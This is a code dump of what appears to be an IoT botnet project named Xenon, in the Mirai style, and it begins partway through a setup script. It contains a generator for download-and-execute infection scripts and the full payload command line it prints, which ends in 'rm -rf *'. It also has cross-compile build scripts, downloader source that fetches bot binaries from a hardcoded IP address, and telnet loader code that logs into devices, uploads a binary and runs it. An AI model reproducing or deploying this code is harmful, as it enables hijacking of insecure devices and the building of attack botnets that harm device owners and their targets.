/var/lib/tftpboot/'+dirname+'/'+prefix+'tftp2.sh') 144 | run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/'+dirname+'/'+prefix+'tftp2.sh') 145 | run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/'+dirname+'/'+prefix+'tftp2.sh') 146 | run('echo -e "#!/bin/bash" > /var/www/html/'+dirname+'/'+prefix+'bins.sh') 147 | 148 | for i in compileas: 149 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ip+'/'+dirname+'/'+i+'; chmod +x '+i+'; ./'+i+'; rm -rf '+i+'" >> /var/www/html/'+dirname+'/'+prefix+'bins.sh') 150 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp '+ip+' -c get '+dirname+'/'+i+'; cat '+i+' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/'+dirname+'/'+prefix+'tftp1.sh') 151 | run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r '+dirname+'/'+i+' -g '+ip+'; cat '+i+' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/'+dirname+'/'+prefix+'tftp2.sh') 152 | 153 | run("service xinetd restart") 154 | time.sleep(5) 155 | run("service httpd restart") 156 | time.sleep(5) 157 | print("\x1b[1;36mUnlimiting Connections Allowed to Server...\x1b[0m") 158 | run('echo -e "ulimit -n 99999" >> ~/.bashrc') 159 | time.sleep(5) 160 | 161 | print("\x1b[33mCross-Compiling Complete!\x1b[0m") 162 | 163 | print "Thank You For Using Frostbyte Your payload is: cd /tmp || cd /run || cd /; wget http://"+ip+"/"+dirname+"/"+prefix+"bins.sh; chmod 777 "+prefix+"bins.sh; sh "+prefix+"bins.sh; tftp "+ip+" -c get "+prefix+"tftp1.sh; chmod 777 "+prefix+"tftp1.sh; sh "+prefix+"tftp1.sh; tftp -r "+prefix+"tftp2.sh -g "+ip+"; chmod 777 "+prefix+"tftp2.sh; sh "+prefix+"tftp2.sh; rm -rf "+prefix+"bins.sh "+prefix+"tftp1.sh "+prefix+"tftp2.sh; rm -rf *" 164 | -------------------------------------------------------------------------------- /Xenon/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | export PATH=$PATH:/etc/xcompile/arc/bin 3 | export PATH=$PATH:/etc/xcompile/armv4l/bin 4 | export PATH=$PATH:/etc/xcompile/armv5l/bin 5 | export PATH=$PATH:/etc/xcompile/armv6l/bin 6 | export PATH=$PATH:/etc/xcompile/armv7l/bin 7 | export PATH=$PATH:/etc/xcompile/i586/bin 8 | export PATH=$PATH:/etc/xcompile/m68k/bin 9 | export PATH=$PATH:/etc/xcompile/mips/bin 10 | export PATH=$PATH:/etc/xcompile/mipsel/bin 11 | export PATH=$PATH:/etc/xcompile/powerpc/bin 12 | export PATH=$PATH:/etc/xcompile/sh4/bin 13 | export PATH=$PATH:/etc/xcompile/sparc/bin 14 | 15 | export GOROOT=/usr/local/go; export GOPATH=$HOME/Projects/Proj1; export PATH=$GOPATH/bin:$GOROOT/bin:$PATH; go get github.com/go-sql-driver/mysql; go get github.com/mattn/go-shellwords 16 | 17 | gcc -static -O3 -lpthread -pthread ~/loader/src/*.c -o ~/loader/loader 18 | 19 | armv4l-gcc -Os -D BOT_ARCH=\"arm\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm 20 | armv5l-gcc -Os -D BOT_ARCH=\"arm5\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm5 21 | armv6l-gcc -Os -D BOT_ARCH=\"arm6\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm6 22 | armv7l-gcc -Os -D BOT_ARCH=\"arm7\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.arm7 23 | i586-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.x86 24 | m68k-gcc -Os -D BOT_ARCH=\"m68k\" -D M68K -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.m68k 25 | mips-gcc -Os -D BOT_ARCH=\"mips\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.mips 26 | mipsel-gcc -Os -D BOT_ARCH=\"mpsl\" -D MIPSEL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.mpsl 27 | powerpc-gcc -Os -D BOT_ARCH=\"ppc\" -D PPC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.ppc 28 | sh4-gcc -Os -D BOT_ARCH=\"sh4\" -D SH4 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.sh4 29 | sparc-gcc -Os -D BOT_ARCH=\"spc\" -D SPARC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static ~/dlr/main.c -o ~/dlr/release/dlr.spc 30 | 31 | echo "HakkaMoments" > ~/dlr/release/dlr.arc 32 | armv4l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm 33 | armv5l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm5 34 | armv6l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm6 35 | armv7l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.arm7 36 | i586-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.x86 37 | m68k-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.m68k 38 | mips-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.mips 39 | mipsel-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.mpsl 40 | powerpc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.ppc 41 | sh4-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.sh4 42 | sparc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ~/dlr/release/dlr.spc 43 | mv ~/dlr/release/dlr* ~/loader/bins -------------------------------------------------------------------------------- /Xenon/dlr/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | //#include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | // -L haha you already got an idea of who this is? ^.^ 9 | #define HTTP_SERVER utils_inet_addr(45,95,168,86) 10 | 11 | #define EXEC_MSG "we gone now\n" 12 | #define EXEC_MSG_LEN 13 13 | 14 | #define DOWNLOAD_MSG "hello sir -L\n" 15 | #define DOWNLOAD_MSG_LEN 14 16 | 17 | #define STDIN 0 18 | #define STDOUT 1 19 | #define STDERR 2 20 | 21 | #if BYTE_ORDER == BIG_ENDIAN 22 | #define HTONS(n) (n) 23 | #define HTONL(n) (n) 24 | #elif BYTE_ORDER == LITTLE_ENDIAN 25 | #define HTONS(n) (((((unsigned short)(n) & 0xff)) << 8) | (((unsigned short)(n) & 0xff00) >> 8)) 26 | #define HTONL(n) (((((unsigned long)(n) & 0xff)) << 24) | \ 27 | ((((unsigned long)(n) & 0xff00)) << 8) | \ 28 | ((((unsigned long)(n) & 0xff0000)) >> 8) | \ 29 | ((((unsigned long)(n) & 0xff000000)) >> 24)) 30 | #else 31 | #error "Fix byteorder" 32 | #endif 33 | 34 | #ifdef __ARM_EABI__ 35 | #define SCN(n) ((n) & 0xfffff) 36 | #else 37 | #define SCN(n) (n) 38 | #endif 39 | 40 | inline void run(void); 41 | int sstrlen(char *); 42 | unsigned int utils_inet_addr(unsigned char, unsigned char, unsigned char, unsigned char); 43 | 44 | /* stdlib calls */ 45 | int xsocket(int, int, int); 46 | int xwrite(int, void *, int); 47 | int xread(int, void *, int); 48 | int xconnect(int, struct sockaddr_in *, int); 49 | int xopen(char *, int, int); 50 | int xclose(int); 51 | void x__exit(int); 52 | 53 | #define socket xsocket 54 | #define write xwrite 55 | #define read xread 56 | #define connect xconnect 57 | #define open xopen 58 | #define close xclose 59 | #define __exit x__exit 60 | 61 | void __start(void) 62 | { 63 | #if defined(MIPS) || defined(MIPSEL) 64 | __asm( 65 | ".set noreorder\n" 66 | "move $0, $31\n" 67 | "bal 10f\n" 68 | "nop\n" 69 | "10:\n.cpload $31\n" 70 | "move $31, $0\n" 71 | ".set reorder\n" 72 | ); 73 | #endif 74 | run(); 75 | } 76 | 77 | inline void run(void) 78 | { 79 | char recvbuf[128]; 80 | struct sockaddr_in addr; 81 | int sfd, ffd, ret; 82 | unsigned int header_parser = 0; 83 | int arch_strlen = sstrlen(BOT_ARCH); 84 | 85 | write(STDOUT, EXEC_MSG, EXEC_MSG_LEN); 86 | 87 | addr.sin_family = AF_INET; 88 | addr.sin_port = HTONS(80); 89 | addr.sin_addr.s_addr = HTTP_SERVER; 90 | 91 | ffd = open("wrgnuwrijo", O_WRONLY | O_CREAT | O_TRUNC, 0777); 92 | 93 | sfd = socket(AF_INET, SOCK_STREAM, 0); 94 | 95 | #ifdef DEBUG 96 | if (ffd == -1) 97 | printf("Failed to open file!\n"); 98 | if (sfd == -1) 99 | printf("Failed to call socket()\n"); 100 | #endif 101 | 102 | if (sfd == -1 || ffd == -1) 103 | __exit(1); 104 | 105 | #ifdef DEBUG 106 | printf("Connecting to host...\n"); 107 | #endif 108 | 109 | if ((ret = connect(sfd, &addr, sizeof (struct sockaddr_in))) < 0) 110 | { 111 | #ifdef DEBUG 112 | printf("Failed to connect to host.\n"); 113 | #endif 114 | write(STDOUT, "gaf\n", 5); 115 | __exit(-ret); 116 | } 117 | 118 | #ifdef DEBUG 119 | printf("Connected to host\n"); 120 | #endif 121 | 122 | if (write(sfd, "GET /" BOT_ARCH " HTTP/1.0\r\n\r\n", 17 + arch_strlen + 13) != (17 + arch_strlen + 13)) 123 | { 124 | #ifdef DEBUG 125 | printf("Failed to send get request.\n"); 126 | #endif 127 | 128 | __exit(3); 129 | } 130 | 131 | #ifdef DEBUG 132 | printf("Started header parse...\n"); 133 | #endif 134 | 135 | while (header_parser != 0x0d0a0d0a) 136 | { 137 | char ch; 138 | int ret = read(sfd, &ch, 1); 139 | 140 | if (ret != 1) 141 | __exit(4); 142 | header_parser = (header_parser << 8) | ch; 143 | } 144 | 145 | #ifdef DEBUG 146 | printf("Finished receiving HTTP header\n"); 147 | #endif 148 | 149 | while (1) 150 | { 151 | int ret = read(sfd, recvbuf, sizeof (recvbuf)); 152 | 153 | if (ret <= 0) 154 | break; 155 | write(ffd, recvbuf, ret); 156 | } 157 | 158 | close(sfd); 159 | close(ffd); 160 | write(STDOUT, DOWNLOAD_MSG, DOWNLOAD_MSG_LEN); 161 | __exit(5); 162 | } 163 | 164 | int sstrlen(char *str) 165 | { 166 | int c = 0; 167 | 168 | while (*str++ != 0) 169 | c++; 170 | return c; 171 | } 172 | 173 | unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsigned char three, unsigned char four) 174 | { 175 | unsigned long ip = 0; 176 | 177 | ip |= (one << 24); 178 | ip |= (two << 16); 179 | ip |= (three << 8); 180 | ip |= (four << 0); 181 | return HTONL(ip); 182 | } 183 | 184 | int xsocket(int domain, int type, int protocol) 185 | { 186 | #if defined(__NR_socketcall) 187 | #ifdef DEBUG 188 | printf("socket using socketcall\n"); 189 | #endif 190 | struct { 191 | int domain, type, protocol; 192 | } socketcall; 193 | socketcall.domain = domain; 194 | socketcall.type = type; 195 | socketcall.protocol = protocol; 196 | 197 | // 1 == SYS_SOCKET 198 | int ret = syscall(SCN(SYS_socketcall), 1, &socketcall); 199 | 200 | #ifdef DEBUG 201 | printf("socket got ret: %d\n", ret); 202 | #endif 203 | return ret; 204 | #else 205 | #ifdef DEBUG 206 | printf("socket using socket\n"); 207 | #endif 208 | return syscall(SCN(SYS_socket), domain, type, protocol); 209 | #endif 210 | } 211 | 212 | int xread(int fd, void *buf, int len) 213 | { 214 | return syscall(SCN(SYS_read), fd, buf, len); 215 | } 216 | 217 | int xwrite(int fd, void *buf, int len) 218 | { 219 | return syscall(SCN(SYS_write), fd, buf, len); 220 | } 221 | 222 | int xconnect(int fd, struct sockaddr_in *addr, int len) 223 | { 224 | #if defined(__NR_socketcall) 225 | #ifdef DEBUG 226 | printf("connect using socketcall\n"); 227 | #endif 228 | struct { 229 | int fd; 230 | struct sockaddr_in *addr; 231 | int len; 232 | } socketcall; 233 | socketcall.fd = fd; 234 | socketcall.addr = addr; 235 | socketcall.len = len; 236 | // 3 == SYS_CONNECT 237 | int ret = syscall(SCN(SYS_socketcall), 3, &socketcall); 238 | 239 | #ifdef DEBUG 240 | printf("connect got ret: %d\n", ret); 241 | #endif 242 | 243 | return ret; 244 | #else 245 | #ifdef DEBUG 246 | printf("connect using connect\n"); 247 | #endif 248 | return syscall(SCN(SYS_connect), fd, addr, len); 249 | #endif 250 | } 251 | 252 | int xopen(char *path, int flags, int other) 253 | { // this 254 | return syscall(SCN(SYS_openat), path, flags, other); // openat, if gives error use open 255 | } 256 | 257 | int xclose(int fd) 258 | { 259 | return syscall(SCN(SYS_close), fd); 260 | } 261 | 262 | void x__exit(int code) 263 | { 264 | syscall(SCN(SYS_exit), code); 265 | } 266 | -------------------------------------------------------------------------------- /Xenon/iplookup.php: -------------------------------------------------------------------------------- 1 | = 8){ 8 | $resp = file_get_contents("http://ip-api.com/json/$ip?fields=520191&lang=en"); 9 | $resp = str_replace('{', NULL, $resp); 10 | $resp = str_replace('}', NULL, $resp); 11 | $resp = str_replace('"', NULL, $resp); 12 | $resp = str_replace(':', ': ', $resp); 13 | $resp = str_replace(",", "\r\n", $resp); 14 | $resp = str_replace("\r\nstatus: success", NULL, $resp); 15 | echo $resp; 16 | //echo "IP -> $ip"; 17 | } 18 | else echo "[IPLookup-API] Syntax Error, Example: http://1.1.1.1/api.php?ip=1.3.3.7"; 19 | 20 | ?> -------------------------------------------------------------------------------- /Xenon/loader/src/binary.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "headers/includes.h" 7 | #include "headers/binary.h" 8 | 9 | static int bin_list_len = 0; 10 | static struct binary **bin_list = NULL; 11 | 12 | BOOL binary_init(void) 13 | { 14 | glob_t pglob; 15 | int i = 0; 16 | 17 | if(glob("bins/dlr.*", GLOB_ERR, NULL, &pglob) != 0) 18 | { 19 | //printf("Failed to load from bins folder!\n"); 20 | return; 21 | } 22 | 23 | for(i = 0; i < pglob.gl_pathc; i++) 24 | { 25 | char file_name[256]; 26 | struct binary *bin; 27 | 28 | bin_list = realloc(bin_list, (bin_list_len + 1) * sizeof(struct binary *)); 29 | bin_list[bin_list_len] = calloc(1, sizeof(struct binary)); 30 | bin = bin_list[bin_list_len++]; 31 | 32 | #ifdef DEBUG 33 | //printf("(%d/%d) %s is loading...\n", i + 1, pglob.gl_pathc, pglob.gl_pathv[i]); 34 | #endif 35 | strcpy(file_name, pglob.gl_pathv[i]); 36 | strtok(file_name, "."); 37 | strcpy(bin->arch, strtok(NULL, ".")); 38 | load(bin, pglob.gl_pathv[i]); 39 | } 40 | 41 | globfree(&pglob); 42 | return TRUE; 43 | } 44 | 45 | struct binary *binary_get_by_arch(char *arch, int len) 46 | { 47 | int i = 0; 48 | 49 | for(i = 0; i < bin_list_len; i++) 50 | { 51 | if(strncmp(arch, bin_list[i]->arch, len) == 0) 52 | { 53 | #ifdef DEBUG 54 | printf("Compared arch %s with %s\n", arch, bin_list[i]->arch); 55 | #endif 56 | return bin_list[i]; 57 | } 58 | } 59 | 60 | return NULL; 61 | } 62 | 63 | static BOOL load(struct binary *bin, char *fname) 64 | { 65 | FILE *file; 66 | char rdbuf[BINARY_BYTES_PER_ECHOLINE]; 67 | int n = 0; 68 | 69 | if((file = fopen(fname, "r")) == NULL) 70 | { 71 | //printf("Failed to open %s forparsing\n", fname); 72 | return FALSE; 73 | } 74 | 75 | while((n = fread(rdbuf, sizeof(char), BINARY_BYTES_PER_ECHOLINE, file)) != 0) 76 | { 77 | char *ptr; 78 | int i = 0; 79 | 80 | bin->hex_payloads = realloc(bin->hex_payloads, (bin->hex_payloads_len + 1) * sizeof(char *)); 81 | bin->hex_payloads[bin->hex_payloads_len] = calloc(sizeof(char), (4 * n) + 8); 82 | ptr = bin->hex_payloads[bin->hex_payloads_len++]; 83 | 84 | for(i = 0; i < n; i++) 85 | ptr += sprintf(ptr, "\\x%02x", (uint8_t)rdbuf[i]); 86 | } 87 | 88 | return FALSE; 89 | } 90 | -------------------------------------------------------------------------------- /Xenon/loader/src/headers/binary.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | //#define BINARY_BYTES_PER_ECHOLINE 128 6 | #define BINARY_BYTES_PER_ECHOLINE 64 7 | 8 | struct binary 9 | { 10 | char arch[6]; 11 | int hex_payloads_len; 12 | char **hex_payloads; 13 | }; 14 | 15 | BOOL binary_init(void); 16 | struct binary *binary_get_by_arch(char *arch, int len); 17 | 18 | static BOOL load(struct binary *bin, char *fname); 19 | -------------------------------------------------------------------------------- /Xenon/loader/src/headers/config.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define HTTP_SERVER "45.95.168.86" 4 | #define HTTP_PORT 80 5 | 6 | #define TFTP_SERVER "45.95.168.86" 7 | -------------------------------------------------------------------------------- /Xenon/loader/src/headers/connection.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "includes.h" 6 | #include "telnet_info.h" 7 | 8 | struct connection 9 | { 10 | pthread_mutex_t lock; 11 | struct server *srv; 12 | struct binary *bin; 13 | struct telnet_info info; 14 | int fd, echo_load_pos, use_slash_c, echo_retries, clear_up; 15 | time_t last_recv; 16 | enum 17 | { 18 | TELNET_CLOSED, // 1 19 | TELNET_CONNECTING, // 2 20 | TELNET_READ_IACS, // 3 21 | TELNET_USER_PROMPT, // 4 22 | TELNET_PASS_PROMPT, // 5 23 | TELNET_WAITPASS_PROMPT, // 6 24 | TELNET_CHECK_LOGIN, // 7 25 | TELNET_VERIFY_LOGIN, // 8 26 | //TELNET_PARSE_PS, // 8 27 | TELNET_PARSE_MOUNTS, // 9 28 | TELNET_READ_WRITEABLE, // 10 29 | TELNET_COPY_ECHO, // 11 30 | TELNET_DETECT_ARCH, // 12 31 | TELNET_ARM_SUBTYPE, // 13 32 | TELNET_UPLOAD_METHODS, // 14 33 | TELNET_UPLOAD_ECHO, // 15 34 | TELNET_UPLOAD_WGET, // 16 35 | TELNET_UPLOAD_TFTP, // 17 36 | TELNET_RUN_BINARY, // 18 37 | TELNET_CLEANUP // 19 38 | } state_telnet; 39 | struct 40 | { 41 | char data[512]; 42 | int deadline; 43 | } output_buffer; 44 | uint16_t rdbuf_pos, timeout; 45 | BOOL open, success, retry_bin, ctrlc_retry; 46 | uint8_t rdbuf[8192]; 47 | }; 48 | 49 | void connection_open(struct connection *conn); 50 | void connection_close(struct connection *conn); 51 | 52 | int connection_consume_iacs(struct connection *conn); 53 | int connection_consume_login_prompt(struct connection *conn); 54 | int connection_consume_password_prompt(struct connection *conn); 55 | int connection_consume_prompt(struct connection *conn); 56 | int connection_consume_verify_login(struct connection *conn); 57 | //int connection_consume_psoutput(struct connection *conn); 58 | //int connection_consume_mounts(struct connection *conn); 59 | //int connection_consume_written_dirs(struct connection *conn); 60 | int connection_consume_copy_op(struct connection *conn); 61 | int connection_consume_arch(struct connection *conn); 62 | int connection_consume_arm_subtype(struct connection *conn); 63 | int connection_consume_upload_methods(struct connection *conn); 64 | int connection_upload_echo(struct connection *conn); 65 | int connection_upload_wget(struct connection *conn); 66 | int connection_upload_tftp(struct connection *conn); 67 | int connection_verify_payload(struct connection *conn); 68 | int connection_consume_cleanup(struct connection *conn); 69 | 70 | static BOOL can_consume(struct connection *conn, uint8_t *ptr, int amount); 71 | -------------------------------------------------------------------------------- /Xenon/loader/src/headers/includes.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define STDIN 0 6 | #define STDOUT 1 7 | #define STDERR 2 8 | 9 | #define FALSE 0 10 | #define TRUE 1 11 | typedef char BOOL; 12 | 13 | typedef uint32_t ipv4_t; 14 | typedef uint16_t port_t; 15 | 16 | #define ATOMIC_ADD(ptr,i) __sync_fetch_and_add((ptr),i) 17 | #define ATOMIC_SUB(ptr,i) __sync_fetch_and_sub((ptr),i) 18 | #define ATOMIC_INC(ptr) ATOMIC_ADD((ptr),1) 19 | #define ATOMIC_DEC(ptr) ATOMIC_SUB((ptr),1) 20 | #define ATOMIC_GET(ptr) ATOMIC_ADD((ptr),0) 21 | 22 | #define TOKEN_QUERY "/bin/busybox SKID" 23 | #define TOKEN_RESPONSE "SKID: applet not found" 24 | 25 | #define EXEC_QUERY "/bin/busybox SKID" 26 | #define EXEC_RESPONSE "SKID: applet not found" 27 | 28 | #define FN_DROPPER "areyoukidding" 29 | #define FN_BINARY "noimnot" 30 | 31 | extern char *id_tag; 32 | -------------------------------------------------------------------------------- /Xenon/loader/src/headers/server.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "includes.h" 5 | #include "telnet_info.h" 6 | #include "connection.h" 7 | 8 | struct server 9 | { 10 | uint32_t max_open; 11 | volatile uint32_t curr_open; 12 | volatile uint32_t total_input, total_logins, total_echoes, total_wgets, total_tftps, total_successes, total_failures; 13 | char *wget_host_ip, *tftp_host_ip; 14 | struct server_worker *workers; 15 | struct connection **estab_conns; 16 | ipv4_t *bind_addrs; 17 | pthread_t to_thrd; 18 | port_t wget_host_port; 19 | uint8_t workers_len, bind_addrs_len; 20 | int curr_worker_child; 21 | }; 22 | 23 | struct server_worker 24 | { 25 | struct server *srv; 26 | int efd; 27 | pthread_t thread; 28 | uint8_t thread_id; 29 | }; 30 | 31 | struct server *server_create(uint8_t threads, uint8_t addr_len, ipv4_t *addrs, uint32_t max_open, char *wghip, port_t wghp, char *thip); 32 | void server_destroy(struct server *srv); 33 | void server_queue_telnet(struct server *srv, struct telnet_info *info); 34 | void server_telnet_probe(struct server *srv, struct telnet_info *info); 35 | 36 | static void bind_core(int core); 37 | static void *worker(void *arg); 38 | static void handle_output_buffers(struct server_worker *); 39 | static void handle_event(struct server_worker *wrker, struct epoll_event *ev); 40 | static void *timeout_thread(void *); 41 | -------------------------------------------------------------------------------- /Xenon/loader/src/headers/telnet_info.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | struct telnet_info 6 | { 7 | char user[32], pass[32], arch[6], writedir[32]; 8 | ipv4_t addr; 9 | port_t port; 10 | enum 11 | { 12 | UPLOAD_ECHO, 13 | UPLOAD_WGET, 14 | UPLOAD_TFTP 15 | } upload_method; 16 | BOOL has_auth, has_arch; 17 | }; 18 | 19 | struct telnet_info *telnet_info_new(char *user, char *pass, char *arch, ipv4_t addr, port_t port, struct telnet_info *info); 20 | struct telnet_info *telnet_info_parse(char *str, struct telnet_info *out); 21 | -------------------------------------------------------------------------------- /Xenon/loader/src/headers/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "server.h" 4 | #include "includes.h" 5 | 6 | #define BUFFER_SIZE 4096 7 | 8 | #define EI_NIDENT 16 9 | #define EI_DATA 5 10 | 11 | #define EE_NONE 0 12 | #define EE_LITTLE 1 13 | #define EE_BIG 2 14 | 15 | #define ET_NOFILE 0 16 | #define ET_REL 1 17 | #define ET_EXEC 2 18 | #define ET_DYN 3 19 | #define ET_CORE 4 20 | 21 | #define EM_NONE 0 22 | #define EM_M32 1 23 | #define EM_SPARC 2 24 | #define EM_386 3 25 | #define EM_68K 4 26 | #define EM_88K 5 27 | #define EM_486 6 28 | #define EM_860 7 29 | #define EM_MIPS 8 30 | 31 | #define EM_MIPS_RS3_LE 10 32 | #define EM_MIPS_RS4_BE 10 33 | 34 | #define EM_PARISC 15 35 | #define EM_SPARC32PLUS 18 36 | #define EM_PPC 20 37 | #define EM_PPC64 21 38 | #define EM_SPU 23 39 | #define EM_ARM 40 40 | #define EM_SH 42 41 | #define EM_SPARCV9 43 42 | #define EM_H8_300 46 43 | #define EM_IA_64 50 44 | #define EM_X86_64 62 45 | #define EM_S390 22 46 | #define EM_CRIS 76 47 | #define EM_M32R 88 48 | #define EM_MN10300 89 49 | #define EM_OPENRISC 92 50 | #define EM_BLACKFIN 106 51 | #define EM_ALTERA_NIOS2 113 52 | #define EM_TI_C6000 140 53 | #define EM_AARCH64 183 54 | #define EM_TILEPRO 188 55 | #define EM_MICROBLAZE 189 56 | #define EM_TILEGX 191 57 | #define EM_FRV 0x5441 58 | #define EM_AVR32 0x18ad 59 | #define EM_ARC 93 60 | #define EM_RCE 39 61 | 62 | // Added by Light. Would you still call me a skid now? 63 | #define EM_XTENSA 94 64 | 65 | /*struct elf_hdr 66 | { 67 | uint8_t e_ident[EI_NIDENT]; 68 | uint16_t e_type, e_machine; 69 | uint32_t e_version; 70 | } __attribute__((packed));*/ 71 | 72 | struct elf_hdr 73 | { 74 | uint8_t e_ident[EI_NIDENT]; 75 | uint16_t e_type, e_machine; 76 | uint32_t e_version; 77 | }; 78 | 79 | int util_socket_and_bind(struct server *srv); 80 | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len); 81 | BOOL util_sockprintf(int fd, const char *fmt, ...); 82 | char *util_trim(char *str); 83 | -------------------------------------------------------------------------------- /Xenon/loader/src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "headers/includes.h" 11 | #include "headers/server.h" 12 | #include "headers/telnet_info.h" 13 | #include "headers/binary.h" 14 | #include "headers/util.h" 15 | #include "headers/config.h" 16 | 17 | static void *stats_thread(void *); 18 | 19 | char *id_tag = "wget.echo.telnet"; 20 | 21 | static struct server *srv; 22 | 23 | int main(int argc, char **args) 24 | { 25 | pthread_t stats_thrd; 26 | uint8_t addrs_len; 27 | ipv4_t *addrs; 28 | uint32_t total = 0; 29 | struct telnet_info info; 30 | 31 | addrs_len = 1; 32 | addrs = calloc(4, sizeof(ipv4_t)); 33 | addrs[0] = inet_addr("0.0.0.0"); 34 | 35 | if (argc == 2) 36 | { 37 | id_tag = args[1]; 38 | } 39 | 40 | if(!binary_init()) 41 | { 42 | return 1; 43 | } 44 | 45 | if((srv = server_create(sysconf(_SC_NPROCESSORS_ONLN), addrs_len, addrs, 1024 * 64, HTTP_SERVER, HTTP_PORT, TFTP_SERVER)) == NULL) 46 | { 47 | return 1; 48 | } 49 | 50 | pthread_create(&stats_thrd, NULL, stats_thread, NULL); 51 | 